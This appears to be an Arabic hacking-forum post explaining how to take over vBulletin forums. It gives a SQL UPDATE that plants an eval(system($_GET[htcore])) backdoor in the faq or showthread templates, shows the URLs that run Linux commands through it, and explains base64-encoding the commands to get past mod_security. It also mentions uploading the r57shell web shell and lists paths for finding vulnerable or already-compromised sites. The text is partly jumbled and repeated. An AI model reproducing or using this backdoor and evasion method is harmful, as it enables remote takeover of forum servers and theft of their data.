مشاهدات الان
سلام عليكم ... احبتناوبعد التحيهـ
واللى يقول غلط تراه ضايع ...
faq.php
الاستغلال
faq.php?htcore=pwd
مكان pwd نفذ اوامر لينوكس
استعلام 2 في حال الملف faq.php محذوف
showthread.php
الاستغلال
showthread.php?htcore=pwd
مكان pwd نفذ اوامر لينوكس
ولتخطي المود سيكيرتي ما عليك غير تعدل
لكن انتبه الاستغلال الان اصبح يختلف , لازم تشفر الاوامر base64 يمشي معاك الامر
حصريا للجميع مني : والله يستر عليكم من ذا الشرح
- الاختراق للمنتديات يعني سكربت المنتدي vBulletin
* تعتمد على الثغرات ! غير هذا ما فيه ... هذا الوصل للبدايه
* بعدها يقوم المخترق برفع الشيل ... ويتحكم بكل حريه
* وللمحترفين التعامل في الوصول للاستضافه وغيرها
واللى يقول غلط تراه ضايع ...
والمواقع التى تنشر اخر الثغرات تابع تحت
- Index of /r57shell/ public_html/vb/faq.php
- Index of /r57shell/ public_html/vb/phpinfo()
- ps/vb/online.php111 منتدي فلسطيني اولهم ؟
vBulletin 3.7.3 Patch Level 1 - Nulled By Protect-Sites انتبهوا نسخ طايح حضهاإأ
- vb/calendar.php?month=8&year=2001&c=1&do=displaymonth&explain=1
- vb/faq.php?faq=vb3_board_usage
- vb/faq.php?s=r57shell off
- vb/faq.php?faq=vb3_board_faq
- kid <> x3q(at)hotmail(dot)com
- r57shell=calendar.php
- vb/faq.php?faq=kid <> x3q(at)hotmail(dot)com
- Database تضع الكلمه في التعليمات ويضهر البيانات تلقائي
- public_html
- Default Calendar
- /calendar.php
- sitemap.xml
- ! r57shell 1.40
القاعدة نفذ الأستعلام هذا , ويعطيك العافيةUPDATE template set template="{${eval(system($_GET[htcore]))}}" where title like "%faq%"بتلاقي الثغرة في ملف
faq.php
الاستغلال
faq.php?htcore=pwd
مكان pwd نفذ اوامر لينوكس
استعلام 2 في حال الملف faq.php محذوف
UPDATE template set template="{${eval(system($_GET[htcore]))}}" where title="showthread"بتلاقي الثغرة في ملف
showthread.php
الاستغلال
showthread.php?htcore=pwd
مكان pwd نفذ اوامر لينوكس
ولتخطي المود سيكيرتي ما عليك غير تعدل
$_GET[htcore]وتحط مكانها ,
base64_decode($_GET[htcore])
لكن انتبه الاستغلال الان اصبح يختلف , لازم تشفر الاوامر base64 يمشي معاك الامر
ومنتظر الرد لإكمل النقاش معكم